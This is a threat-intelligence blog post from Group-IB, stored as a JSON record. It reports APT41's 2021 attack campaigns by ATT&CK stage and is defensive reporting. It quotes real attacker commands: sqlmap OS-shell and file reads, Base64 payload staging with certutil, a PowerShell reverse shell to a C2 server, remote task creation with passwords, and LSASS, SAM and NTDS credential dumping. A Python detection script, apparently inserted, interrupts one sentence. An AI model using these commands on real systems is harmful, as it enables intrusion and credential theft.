{
	"id": "86910c10-cb2d-4e29-b505-3c995ba4be2d",
	"created_at": "2026-04-06T15:52:53.16633Z",
	"updated_at": "2026-04-10T03:32:27.385749Z",
	"deleted_at": null,
	"sha1_hash": "b8c8f7882ae6d87fb4652b6fbae63e6119856445",
	"title": "4 malicious campaigns and a new wave of APT41 attacks | Group-IB Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 191117,
	"plain_text": "Nikita Rostovcev\r\nAPAC Technical Head - ASM, TI \u0026 DRP\r\nAPT41 World Tour 2021 on a tight schedule\r\n4 malicious campaigns, 13 confirmed victims, and a new wave of Cobalt Strike infections\r\nAugust 18, 2022 · Advanced Persistent Threats\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 1 of 35\n\nAPT41 Threat Intelligence\r\nIn March 2022 one of the oldest state-sponsored hacker groups, APT41, breached government networks in six US states, including by exploiting a vulnerability in a livestock management system, Mandiant investigators have reported.\r\nThroughout 2021, we closely watched APT41’s activity using our system called Group-IB Threat Intelligence, which is continuously enriched with indicators of compromise (IOCs) and new rules for hunting hacker groups and threat actors. Our efforts have resulted in about 80 proactive notifications to private and government organizations worldwide regarding APT41 attacks (both in progress and completed) against their infrastructures, so that the organizations could take the necessary steps to protect themselves or search for traces of compromise in their networks. The data about the tactics, techniques and procedures (TTPs) used by the attackers that we collected helped us attribute the group’s other attacks. Using this data, we identified the threat actors’ “work” schedule, which makes it possible to describe their origin in more detail. 
In this blog post, we share our findings and describe the main methods, tactics and tools used by one of the most dangerous threat groups out there, APT41, in 2021.\r\nThis blog post, which was written to bring together existing knowledge according to the MITRE ATT\u0026CK (Adversarial Tactics, Techniques \u0026 Common Knowledge) framework, details how the hackers conducted reconnaissance, gained initial access, ensured persistence and moved across the network, as well as what they were looking for on the compromised devices. In addition, we share interesting findings such as the “work” schedule and working days of the attackers, together with artifacts they left behind.\r\nThe first thing we want to mention is that APT41 used an unusual method of creating payloads on target servers, which involves writing a Base64-encoded Cobalt Strike Beacon to a file in multiple stages. To search for and exploit vulnerabilities, the group uses popular tools such as Acunetix, Nmap, JexBoss, sqlmap, and fofa.su (a Chinese equivalent of Shodan).\r\nInterestingly, according to sqlmap logs, the threat actors breached only half of the websites they were interested in. This suggests that even hackers like APT41 do not always go out of their way to ensure that a breach is successful.\r\nThis blog post also uncovers subnets from which the threat actors connected to their C\u0026C servers, which is further evidence confirming the threat’s country of origin.\r\nFor the first time, we were able to identify the group’s working hours in 2021, which are similar to regular office business hours.\r\nIT directors, heads of cybersecurity teams, SOC analysts and incident response specialists are likely to find this material useful. 
Our goal is to reduce financial losses and infrastructure downtime as well as to help take preventive measures to fend off APT41 attacks.\r\nIn the conclusion section, we give advice on how to identify the group’s infrastructure and protect yours. Let us hunt together for the threats, and contribute to the fight against cybercrime — a mission worthy of a superhero.\r\nWho are APT41?\r\nKey findings\r\nA state-sponsored group whose goals include cyber espionage and financial gain\r\nActive since at least 2007\r\nAlso known as BARIUM, Winnti, LEAD, WICKED SPIDER, WICKED PANDA, Blackfly, Suckfly, Winnti Umbrella, Double Dragon\r\nSome of the group’s members were indicted by the US Department of Justice in 2020; charges against them include unauthorized access to protected computers, aggravated identity theft, money laundering, and wire fraud\r\nAttack geography and target industries\r\nFirst, we will list all the countries and industries that came to our attention in 2021. Over this period, APT41 conducted at least four malicious campaigns, which we named based on the domain names used in the attacks: ColunmTK, DelayLinkTK, Mute-Pond, and Gentle-Voice.\r\nWe estimate that in 2021 APT41 compromised and gained various levels of access to at least 13 organizations worldwide.\r\nThe group’s targets include government and private organizations based in the US, Taiwan, India, Thailand, China, Hong Kong, Mongolia, Indonesia, Vietnam, Bangladesh, Ireland, Brunei, and the UK.\r\nIn the campaigns that we analyzed, APT41 targeted the following industries: the government sector, manufacturing, healthcare, logistics, hospitality, finance, education, telecommunications, consulting, sports, media, and travel. 
The targets also included a political group, military organizations, and airlines.\r\nTo conduct reconnaissance, the threat actors use tools such as Acunetix, Nmap, sqlmap, OneForAll, subdomain3, subDomainsBrute, and Sublist3r.\r\nAs an initial vector, the group uses web applications vulnerable to SQL injection attacks.\r\nBy performing SQL injections, APT41 gains access to the command shell of a targeted server and becomes able to execute commands.\r\nWe estimate that in 2021 APT41 detected and exploited SQL injection opportunities in 43 out of 86 web applications that they probed.\r\nThe main tool used in their campaigns is a custom Cobalt Strike Beacon.\r\nAPT41’s “working” days are Monday to Friday. They usually start at 10 AM and finish around 7 PM (UTC+8).\r\nThe targets in these campaigns were organizations in the US, Taiwan, India, China, Thailand, Hong Kong, Mongolia, Indonesia, Vietnam, Bangladesh, Ireland, Brunei, and the UK:\r\nNews agencies, government organizations, a major electronics manufacturer, and a logistics company in Taiwan\r\nA software developer and several companies that own a chain of hotels in the US\r\nA financial organization and an educational entity in Vietnam\r\nA news agency and a software developer in China\r\nAn Indian airline\r\nTTPs\r\nThis section describes APT41’s tactics, techniques and procedures that came to the attention of Group-IB’s Threat Intelligence team in 2021.\r\nReconnaissance\r\nThe first stage of any attack is reconnaissance, as part of which threat actors use a wide range of techniques to collect data about the target organization. They can be divided into two categories: active and passive scanning. 
Below is a list of tools used by APT41 from both categories:\r\nActive scanning – T1595:\r\nAcunetix vulnerability scanner\r\nNmap network scanner\r\nSubdomain brute-forcing utilities: OneForAll, subdomain3, subDomainsBrute, Sublist3r\r\nJexBoss, a tool for searching for and exploiting vulnerabilities in JBoss and other Java applications\r\nPassive scanning. Search Open Technical Databases: Scan Databases – T1596.005:\r\nfofa.su (a Chinese equivalent of shodan.io) scans the Internet and collects information about open ports and the services running on them, which enables attackers to determine their targets and conduct attacks more effectively.\r\nInitial Access\r\nExploit Public-Facing Application – T1190\r\nA major question for an investigator is how the attackers penetrated the target system. At the penetration stage, APT41 threat actors used various techniques, including spear-phishing emails, exploiting a range of vulnerabilities (including ProxyLogon), and watering hole and supply chain attacks. In the campaigns we analyzed, in some cases the threat actors penetrated target systems using SQL injections. Below we describe the commands used by APT41 in detail. Such attacks were carried out with the publicly available tool sqlmap, which the attackers used for multiple purposes. In some organizations APT41 members gained access to the command shell of a target server and were able to execute certain commands. The group also used this tool to upload files to the target server. 
At this stage, the files were either Cobalt Strike Beacons or custom web shells.\r\nIn other cases, the threat actors gained access to databases with information about existing accounts, lists of employees, and plaintext and hashed passwords.\r\nNevertheless, the main tool that the attackers used in their campaigns was Cobalt Strike Beacon.\r\nsqlmap commands launched in various attacks:\r\npython sqlmap.py -r [Company1_domain].txt --tamper=space2comment --random-agent -p ctl00%24ContentPlaceHolder1%24txtUserName,ctl00%24ContentPlaceHolder1%24txtPasswo --os-shell\r\npython sqlmap.py -r [Company2_domain].txt -p \"ctl00%24MainContent%24txtUserName,ctl00%24MainContent%24txtPassword\" --is-dba --hex\r\nsqlmap.py -u [Company3_domain]/content.php?id=2141\u0026sub=153 --random-agent --tamper=space2comment --time-sec=10 --current-user\r\npython sqlmap.py -r [Company4_domain] -p \"ctl00%24ContentPlaceHolder1%24txtUserName,ctl00%24ContentPlaceHolder1%24txtPassw --file-write=\"/root/sqlmap/{Redacted_filename}.aspx\" --file-dest=\"{Redacted_filepath}\\\\login1.aspx\"\r\npython sqlmap.py -u \"http://[Company5_domain]/[redacted]/[redacted]/[redacted].php/?page1=DM\u0026page2=TOTAL_DATA_DOWNLOAD\u0026page3=TOTAL_DATA_DOWNLOAD\" -p \"page1\" --file-read \"/etc/passwd\"\r\nThe SQL injections enabled the threat actors to gain various levels of access to 43 out of 86 websites they probed. The following diagrams were built based on sqlmap logs. According to this data, MySQL was installed on most of the compromised websites.\r\nExecution\r\nCommand and Scripting Interpreter: Windows Command Shell – T1059.003\r\nAt this stage of the attack, in order to upload malicious code to target devices and execute it, the threat actors chose the following unique method:\r\nThey used Cobalt Strike Beacon as a payload. 
In one of the observed cases, in order to write the entire payload to a file, the threat actors needed to repeat this action 154 times.\r\necho TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \u003e\u003e C:\\dns.txt\r\n----\r\necho AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \u003e\u003e C:\\dns.txt\r\necho 5kgXfx+Ig8S1vr8p7ifpkRNTIwypOpYrBDdptgjbLcJBcAUqEK/+D85bYT9RGiYYZ9UR4ejo6ca0 \u003e\u003e C:\\dns.txt\r\ncertutil -decode C:\\dns.txt C:\\dns.exe\r\ncertutil -hashfile C:\\dns.exe\r\ncopy C:\\dns.exe C:\\WINDOWS\\dns.exe\r\nmove C:\\dns.exe C:\\windows\\mciwave.exe\r\nThe same method of dividing the payload was observed in the network belonging to another organization, where the threat actors divided the code into chunks of 1,024 characters. To write the payload fully, in this case they needed 128 iterations.\r\n1. Once the payload is compiled, it is encoded in Base64.\r\n2. The encoded payload is divided into chunks of 775 characters and appended to a text file with the following command: echo [Base64]{775} \u003e\u003e C:\\dns.txt\r\n3. Once the encoded payload has been written to the file, the built-in Windows utility certutil is launched with the parameter -decode, which converts the Base64-encoded payload back into an .exe file.\r\n4. After the file is decoded, the attackers launch certutil again with the parameter -hashfile to obtain the hash of the resulting file. 
This action has to do with the fact that the attackers conduct each iteration manually and could make a mistake at a certain point. Checking the file hash helps ensure that the data has been written correctly and that the payload has been decoded without any errors.\r\n5. The file is then renamed and moved to other directories to cover any tracks, after which the attackers launch it.\r\necho o3wiZy3M7pERynevamNQTtL5VZf3C+vS22sRbsUgj8Lw005hIB1mVlNyvdw5GWrKgdMrpkJ2m \u003e\u003e C:\\temp\\bug.txt\r\necho Wv39JqjpZEGW7rjPYW5t09Ck9AQTc94kJ5nfTPEh6KVvRAeuMw23lQdZy/ZquMQOcy9ozRl7 \u003e\u003e C:\\temp\\bug.txt\r\nBelow are other identified methods of uploading and executing malicious files. These are not unique:\r\nCommand and Scripting Interpreter: PowerShell – T1059.001\r\nAPT41 used PowerShell to obtain a reverse shell. The PowerShell one-liner that the group used ran with a hidden window and connected the device it ran on to the C\u0026C server, which in turn allowed the threat actors to execute remote commands.\r\npowershell -nop -W hidden -noni -ep bypass -c \"$TCPClient = New-Object Net.Sockets.TCPClient('{redacted}', 80);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL\u003e ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2\u003e\u00261 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()\"\r\nScheduled Task/Job: Scheduled Task – T1053.005\r\nTask Scheduler was used to launch malicious files on computers 
where the threat actors already had sessions as well as on computers that the group discovered during reconnaissance.\r\nSCHTASKS /Create /S 192.168.100.19 /U \"{redacted}\\administrator\" /P \"!@#Virg0#@!\" /RU SYSTEM /SC DAILY /TN Exec2022 /TR \"C:\\windows\\system32\\taskhosts.exe\"\r\nSCHTASKS /run /S 192.168.100.19 /U \"{redacted}\\administrator\" /P \"!@#Virg0#@!\" /TN Exec2022\r\nSystem Services: Service Execution – T1569.002\r\nWindows services were created and launched with the aim of running either an executable or a script file called install.bat. We described it in our blog post about the ColunmTK campaign. This file has been mentioned several times by other vendors (e.g., Mandiant), which is why we are not describing it in detail here.\r\nsc \\\\172.16.2.146 Create SuperIe binPath= \"cmd.exe /k \"c:\\users\\public\\install.bat\"\r\nsc \\\\192.168.111.112 create res binpath=\"C:\\PerfLogs\\vmserver.exe\"\r\nsc \\\\192.168.111.112 start res\r\nsc query LxpSrvc\r\nsc delete LxpSrvc\r\nWindows Management Instrumentation – T1047\r\nThe hackers did not overlook Windows Management Instrumentation and used the technique in several malicious campaigns.\r\nwmic /node:172.19.97.102 /user:{redacted}\\{redacted} /password:P$ssw0rd0006 process call create \"C:\\users\\Public\\COMSysUpdate.exe\"\r\nwmic /node:172.21.2.177 /user:{redacted}\\{redacted} /password:Passw0rd@123 process call create \"c:\\users\\Public\\install.bat\"\r\nPersistence\r\nTo ensure persistence in target systems, the attackers used Task Scheduler and created Windows services.\r\nScheduled Task/Job: Scheduled Task – T1053.005\r\nschtasks /create /s 192.168.111.3 /u {redacted} /p {redacted} /tn dda /sc onstart /tr C:\\PerfLogs\\vmserver64.exe /ru system /f\r\nSCHTASKS /Create /S 10.200.244.222 /U test\\administrator /P {redacted} /RU \"system\" /tn rlsv /sc DAILY /tr c:\\2012.bat /F\r\n
SCHTASKS /Create /S 192.168.100.19 /U \"{redacted}\\administrator\" /P {redacted} /RU SYSTEM /SC DAILY /TN Exec2022 /TR \"C:\\windows\\system32\\taskhosts.exe\"\r\nschtasks /create /tn rlsv1 /U test\\Administrator /P {redacted} /tr C:\\2012.bat /sc DAILY /s 10.200.244.222 /RU system\r\nSCHTASKS /Create /RU SYSTEM /SC ONSTART /TN Update /TR \"C:\\windows\\system32\\calc.exe\"\r\nSCHTASKS /Create /RU SYSTEM /SC ONSTART /TN dllhosts /TR \"dllhosts.exe\"\r\nschtasks.exe /s 192.168.0.28 /u \"administrator\" /p {redacted} /Create /tn VMUSS /tr \"c:\\users\\public\\install.bat\" /st 15:58 /sc once /ru system\r\nCreate or Modify System Process: Windows Service – T1543.003\r\nsc \\\\172.26.16.81 Create SuperIe binPath= \"cmd.exe /k c:\\users\\public\\SecurityHealthSystray.exe\"\r\nsc Create syscmd binpath= \"cmd/k start\" type= own type= interact\r\nsc \\\\192.168.111.112 create res binpath=\"C:\\PerfLogs\\vmserver.exe\"\r\nsc start LxpSrvc\r\nBoot or Logon Autostart Execution: Registry Run Keys / Startup Folder – T1547.001\r\nIn some cases the threat actors placed their malicious files in the Startup folder on remote computers, which made the files execute every time the victim’s operating system was launched.\r\ncopy C:\\temp\\LxpSvc.exe \"\\\\192.168.100.4\\c$\\Users\\administrator.{redacted}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\LxpSvc.exe\"\r\nPrivilege Escalation\r\nOur analysis did not reveal any instances of APT41 using unique ways of escalating privileges in the network. In addition to the standard capabilities of Cobalt Strike, for such purposes APT41 mainly used additional modules and Aggressor scripts (.cna). Publicly available tools for local privilege escalation (such as BadPotato) were also used to establish persistence. 
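The command lines catalogued in the Execution and Persistence sections above share a few machine-recognisable traits: a long run of echo <base64> >> <file> appends to one path followed by certutil -decode on that same path, and schtasks, sc and wmic invocations that name a remote host and pass credentials inline. The Python hunt below over process-creation telemetry is an added example written for this edit; it is not Group-IB's code or tooling. The events are constructed to mirror the post's commands (host names, timestamps and credentials are invented), the three-field layout (timestamp, host, command line) is an assumption about how an EDR or Sysmon pipeline exports events, and the rule table deliberately goes beyond this section by also covering the ntdsutil, reg save, shadow-copy SAM read and ProcDump-on-LSASS commands from the Credential Access part of the post.

```python
import re
from collections import defaultdict

# Constructed process-creation events (timestamp, host, command line), modelled on the command
# lines in the post. Hosts, times and credentials are invented; the layout is an assumed export
# format (Sysmon event 1 / Security 4688 reduced to the three fields the rules need).
SAMPLE_EVENTS = [
    ('2021-05-12T02:11:03Z', 'WEB01', 'cmd.exe /c echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> C:\\dns.txt'),
    ('2021-05-12T02:11:09Z', 'WEB01', 'cmd.exe /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> C:\\dns.txt'),
    ('2021-05-12T02:11:15Z', 'WEB01', 'cmd.exe /c echo 5kgXfx+Ig8S1vr8p7ifpkRNTIwypOpYrBDdptgjbLcJBcAUqEK/+D85bYT9RGiYYZ9UR4ejo6ca0 >> C:\\dns.txt'),
    ('2021-05-12T02:12:40Z', 'WEB01', 'certutil -decode C:\\dns.txt C:\\dns.exe'),
    ('2021-05-12T02:12:41Z', 'WEB01', 'certutil -hashfile C:\\dns.exe'),
    ('2021-05-12T02:12:50Z', 'WEB01', 'move C:\\dns.exe C:\\windows\\mciwave.exe'),
    ('2021-05-12T02:30:00Z', 'WEB01', 'SCHTASKS /Create /S 192.168.100.19 /U CORP\\administrator /P Secret1 /RU SYSTEM /SC DAILY /TN Exec2022 /TR C:\\windows\\system32\\taskhosts.exe'),
    ('2021-05-12T02:31:00Z', 'WEB01', 'sc \\\\192.168.111.112 create res binpath= C:\\PerfLogs\\vmserver.exe'),
    ('2021-05-12T02:32:00Z', 'WEB01', 'wmic /node:172.21.2.177 /user:CORP\\svc /password:Secret2 process call create c:\\users\\Public\\install.bat'),
    ('2021-05-12T03:00:00Z', 'DC01', 'ntdsutil ac i ntds ifm create full C:\\PerfLogs\\temp q q'),
    ('2021-05-12T03:01:00Z', 'DC01', 'reg save HKLM\\SAM C:\\perflogs\\sam.save'),
    ('2021-05-12T03:02:00Z', 'DC01', 'copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy11\\Windows\\System32\\config\\SAM c:\\users\\public\\SAM'),
    ('2021-05-12T03:05:00Z', 'DC01', 'procdump64.exe -accepteula -ma lsass.exe lsass.dmp'),
    ('2021-05-12T08:00:00Z', 'WS07', 'cmd.exe /c echo done >> C:\\Users\\bob\\build.log'),                 # benign: short echo
    ('2021-05-12T08:01:00Z', 'WS07', 'certutil -hashfile C:\\Users\\bob\\setup.msi SHA256'),            # benign: hash only
    ('2021-05-12T08:02:00Z', 'WS07', 'schtasks /create /tn Backup /sc daily /tr C:\\tools\\backup.cmd'),  # benign: local, no creds
]

# One chunk of a Base64 payload being appended to a staging file. Requiring 40+ Base64 characters
# per echo separates staged code from the one-word echo redirects that build scripts produce.
ECHO_CHUNK = re.compile(r'\becho\s+([A-Za-z0-9+/=]{40,})\s*>>\s*(\S+)', re.IGNORECASE)
CERTUTIL_DECODE = re.compile(r'\bcertutil(?:\.exe)?\s+-decode\s+(\S+)\s+(\S+)', re.IGNORECASE)

# Remote execution or persistence with inline credentials (schtasks, sc, wmic as in the post).
# The schtasks rule uses lookaheads so the switch order does not matter.
REMOTE_EXEC_RULES = [
    ('schtasks_remote_create',
     re.compile(r'\bschtasks(?:\.exe)?\b(?=.*/create\b)(?=.*/s\s+\S+)(?=.*/[up]\s)', re.IGNORECASE)),
    ('sc_remote_create', re.compile(r'\bsc(?:\.exe)?\s+\\\\\S+\s+create\b', re.IGNORECASE)),
    ('wmic_remote_process_create',
     re.compile(r'\bwmic(?:\.exe)?\s+/node:\S+.*\bprocess\s+call\s+create\b', re.IGNORECASE)),
]

# Credential dumping, from the Credential Access section later in the post.
CRED_DUMP_RULES = [
    ('ntdsutil_ifm', re.compile(r'\bntdsutil\b.*\bifm\b', re.IGNORECASE)),
    ('reg_save_hive', re.compile(r'\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|system|security)\b', re.IGNORECASE)),
    ('shadow_copy_sam_read',
     re.compile(r'HarddiskVolumeShadowCopy\d+\\Windows\\System32\\config\\(?:SAM|SYSTEM)\b', re.IGNORECASE)),
    ('procdump_lsass', re.compile(r'\bprocdump(?:64)?(?:\.exe)?\b.*\s-ma\s+lsass', re.IGNORECASE)),
    ('mimikatz_sekurlsa', re.compile(r'sekurlsa::', re.IGNORECASE)),
]


def find_staged_payloads(events, min_chunks=3):
    '''Correlate echo chunks and certutil -decode per (host, staging file). Returns one finding
    per staging file that received at least min_chunks chunks and was later decoded.'''
    chunks = defaultdict(list)   # (host, staging path) -> timestamps of echo appends
    decoded = {}                 # (host, staging path) -> decoded output path
    for ts, host, cmd in events:
        m = ECHO_CHUNK.search(cmd)
        if m:
            chunks[(host, m.group(2).lower())].append(ts)
            continue
        m = CERTUTIL_DECODE.search(cmd)
        if m:
            decoded[(host, m.group(1).lower())] = m.group(2)
    findings = []
    for (host, path), stamps in chunks.items():
        if len(stamps) >= min_chunks and (host, path) in decoded:
            findings.append({'rule': 'base64_staging_echo_certutil', 'host': host,
                             'staging_file': path, 'chunks': len(stamps),
                             'decoded_to': decoded[(host, path)],
                             'first_seen': stamps[0], 'last_seen': stamps[-1]})
    return findings


def match_command_rules(events, rules):
    '''Stateless per-command rules; one finding per (event, rule) hit.'''
    return [{'rule': name, 'host': host, 'time': ts, 'command': cmd}
            for ts, host, cmd in events
            for name, pattern in rules if pattern.search(cmd)]


def hunt_host_events(events):
    return find_staged_payloads(events) + match_command_rules(events, REMOTE_EXEC_RULES + CRED_DUMP_RULES)


if __name__ == '__main__':
    for f in hunt_host_events(SAMPLE_EVENTS):
        print(f['rule'], f['host'], f.get('command') or f['staging_file'])
```

The staging rule is the one worth keeping stateful: a single echo redirect or a lone certutil -hashfile is noise, but three or more long Base64 appends to one path that is then decoded on the same host is the exact shape of the 154- and 128-iteration chains above. Tune min_chunks to the chunk size you expect; the post's 775-character chunks give well over a hundred events per payload, so even a high threshold fires.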
The attackers also used password hashes or accounts obtained at the reconnaissance stage.\r\ncmd.exe /c c:\\windows\\Temp\\BadPotatoNet4.exe c:\\windows\\Temp\\COMSysCon.exe\r\nexecute-assembly C:\\Users\\Administrator\\Desktop\\SweetPotato.exe E:\\Projects\\Operations\\uploads\\documents\\docs\\AxInstSV.exe\r\nDefense Evasion\r\nObfuscated Files or Information: Software Packing – T1027.002\r\nBeing discreet and staying in the victim’s network unnoticed for as long as possible is the goal of any APT. How did APT41 members try to avoid being noticed and cover their tracks? The threat actors used the well-known protection tool Themida to pack their malicious files.\r\nIndicator Removal on Host: File Deletion – T1070.004\r\nWhen certain files were no longer needed, the attackers deleted them.\r\ndel C:\\temp\\LxpSvc.exe\r\ndel c:\\users\\public\\BadPotatoNet4.exe\r\ndel \\\\172.16.2.21\\c$\\users\\Public\\SecurityHealthSystray.dll\r\ndel \\\\172.16.2.21\\c$\\users\\Public\\SecurityHealthSystra.ocx\r\ncopy \"C:\\Windows\\System32\\winevt\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx\" \"C:\\PerfLogs\\mwt.evtx\"\r\nrm C:\\PerfLogs\\mwt.evtx\r\nFile and Directory Permissions Modification: Windows File and Directory Permissions Modification – T1222.001\r\nicacls \\\\192.168.0.243\\c$\\www\\{redacted}\\test2.asp /grant IIS_IUSRS:F\r\nImpair Defenses: Indicator Blocking – T1562.006\r\nAs mentioned earlier, Cobalt Strike was the main tool used in all the campaigns.\r\nThe threat actors developed a custom injector that makes it possible to bypass Event Tracing for Windows (ETW), thereby making the process invisible to the logging system in Windows.\r\nThe second noteworthy feature of this injector is a method taken from an open GitHub repository. 
The idea is to launch a new process in such a way that neither Windows nor antivirus software can inject their binaries into it, which enables the threat actors to bypass built-in antivirus tools.\r\nThe tool is called StealthMutant and it has been described in detail by researchers at Trend Micro.\r\nCredential Access\r\nThis section outlines how the threat actors obtained credentials. To do so, APT41 uses several different, fairly popular techniques.\r\nOS Credential Dumping: NTDS – T1003.003\r\nThe Group-IB Threat Intelligence team discovered that 2021 APT41 campaigns most often involved the Windows utility ntdsutil. The attackers used the tool to obtain a copy of the ntds.dit file, which is the database that stores Active Directory data, including information about user objects, groups, and group membership. The database also includes the password hashes for all the users of the domain.\r\nntdsutil \"ac i ntds\" \"ifm\" \"create full C:\\perflogs\\temp\" q q\r\nntdsutil \"activate instance ntds\" \"ifm\" \"create full C:\\PerfLogs\\temp\" quit quit\r\nOS Credential Dumping: Security Account Manager – T1003.002\r\nThe threat actors also extracted account data from the Security Account Manager (SAM). SAM manages the Windows account database, which includes storing passwords and private user data, grouping the logical structure of accounts, setting security policies, collecting statistics, and controlling access to the database. This data is available either in the registry key HKEY_LOCAL_MACHINE\\SAM\\SAM or in a binary file at %WINDIR%\\System32\\Config\\SAM. 
The attackers tried to make a copy of this database from the registry using the “reg save” command or by reading it from a volume shadow copy.\r\nreg save HKLM\\SAM C:\\perflogs\\sam.save\r\ncopy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy11\\Windows\\System32\\config\\SAM c:\\users\\public\\SAM\r\nOS Credential Dumping: LSASS Memory – T1003.001\r\nAnother source of account credentials is the memory of the Local Security Authority Subsystem Service (LSASS). It is a process in Microsoft Windows operating systems that enforces the security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens. To dump the LSASS process, the threat actors used the utilities ProcDump and Mimikatz.\r\nprocdump64.exe -accepteula -ma lsass.exe lsass.dmp\r\nC:\\mi.exe \"\"privilege::debug\"\" \"\"sekurlsa::logonpasswords full\"\" exit \u003e\u003e C:\\log.tx\r\nmimikatz's sekurlsa::logonpasswords\r\nCredentials from Password Stores: Credentials from Web Browsers – T1555.003\r\nThe threat actors used BrowserGhost, which is a tool designed to obtain credentials from browsers.\r\nBrowserGhost.exe \u003e\u003e iis.txt\r\nUnsecured Credentials: Credentials In Files – T1552.001\r\nThe attackers also searched for strings that contain keywords like “user” or “password” in specific files or entire directories.\r\nfindstr /c:\"User\" /c:\"Password\" /si web.config\r\nfindstr /c:\"User ID=\" /c:\"Password=\"\r\nDiscovery\r\nThreat actors usually use this stage to obtain more information about the infected computer and its local network. At this point, cybercriminals most often leverage the tools built into the operating system.\r\nAccount Discovery – T1087\r\nThe built-in net utility was used to enumerate local and domain accounts. 
The utility helped the adversaries gather information about domain group membership and collect lists of administrators.\r\nnet user /domain \u003e 1.txt\r\nnet user\r\nnet localgroup administrators\r\nnet accounts /domain\r\nnet group \"Domain Admins\"\r\nSystem Information Discovery – T1082\r\nAt this stage, the attackers gathered information about the system’s basic configuration (e.g., the Windows version or system architecture).\r\necho %PROCESSOR_ARCHITECTURE%\r\nsysteminfo\r\nwhoami\r\nnet config Workstation\r\nPermission Groups Discovery – T1069\r\nThe adversary obtained a list of objects from Windows groups as follows:\r\nnet group \"Domain Admins\" /domain\r\nnet group \"domain Controllers\"\r\nnet group \"Exchange Servers\"\r\nnet group \"Schema Admins\"\r\nnet group \"Protected Users\"\r\nnet group \"Enterprise Admins\"\r\nnet group \"Enterprise Read-only Domain Controllers\"\r\nnet group \"Exchange Domain Servers\"\r\nQuery Registry – T1012\r\nThe hackers made queries to the registry to obtain information about the currently used RDP port or the network configuration.\r\nreg query \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber\r\nreg query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\"\r\nreg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters\\Interfaces\\{1f777394-0b42-11e3-80ad-806e6f6e6963}\"\r\nDomain Trust Discovery – T1482\r\ndsquery site\r\nSystem Time Discovery – T1124\r\nnet time /domain\r\nProcess Discovery – T1057\r\nIn some cases, the threat actors conducted reconnaissance on remote devices to establish whether files with certain names were running on them. 
The attackers had downloaded these files to the remote devices earlier.\r\ntasklist /pid 1428 /f\r\ntasklist /s 172.16.2.132 /u test\\administrator /p {redacted}\r\ntasklist | findstr update_x64.exe\r\nNetwork Service Scanning – T1046\r\nAt this stage, the threat actors also used a publicly available tool called cping to identify local computers vulnerable to SMB attacks.\r\nC:\\PerfLogs\\cping40.exe scan smbvul 10.0.0.1 10.0.10.1 \u003e 10.txt\r\ncping40.exe scan smbvul 192.168.20.1 192.168.29.1 \u003e 30.txt\r\nNetwork Share Discovery – T1135\r\nThe threat actors attempted to detect available network shares:\r\nnet share\r\nnet view /DOMAIN\r\nSystem Network Configuration Discovery – T1016\r\nOne of the ways in which the threat actor obtained information about the available network configuration was to access the registry key directly:\r\nreg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters\\Interfaces\\{1f777394-0b42-11e3-80ad-806e6f6e6963}\"\r\nSystem Network Connections Discovery – T1049\r\nTo identify network connections, the hackers used the built-in utility netstat:\r\nnetstat -ano\r\nnetstat -r\r\nnetstat -an\r\nnetstat -aon | findstr \"8080\"\r\nnetstat -ano | findstr dns.exe\r\nRemote System Discovery – T1018\r\nThe hackers used the ping command with a single echo request to identify other devices on the local network. In order to simplify their tasks, they used a FOR loop. They also used the setspn utility to identify on which devices in the domain a particular service was running. 
This helped the attackers identify which devices were running the following services: IIS, SQL and MSSQL.\r\nIt is important to note that in one of the cases we analyzed, the threat actors piped the output to the string “payload” instead of the intended findstr filter, which indicates that the command was copied from another source.\r\nping -n 1 PIST-FILE-SRV\r\nfor /l %i in (1,1,255) do @ping 172.67.204.%i -w 1 -n 1|find /i \"ttl=\"\r\nsetspn -T [target_company_name4] -Q */* | payload\r\nsetspn -T [target_company_name6] -Q */* | findstr IIS\r\nsetspn -T [target_company_name5] -Q */* | findstr SQL\r\nsetspn -T [target_company_name6] -Q */* | findstr MSSQL\r\nLateral Movement\r\nTo move laterally, the threat actors used credentials gathered at the previous stage. If they only had password hashes, they carried out pass-the-hash attacks using Mimikatz.\r\nUse Alternate Authentication Material: Pass the Hash – T1550.002\r\nmimikatz's sekurlsa::pth /user:Administrator /domain:{redacted} /ntlm:{redacted} /run:\"%COMSPEC% /c echo 70c64df2976 \u003e \\\\.\\pipe\\277bf3\"\r\nmimikatz's sekurlsa::pth /user:{redacted} /domain:{redacted} /ntlm:{redacted} /run:\"%COMSPEC% /c echo 22074328564 \u003e \\\\.\\pipe\\bce0a1\"\r\nLateral Tool Transfer – T1570\r\njump psexec64 {redacted} dns\r\nwindows/beacon_dns/reverse_dns_txt (ns1.colunm.tk:53) on {redacted} via Service Control Manager 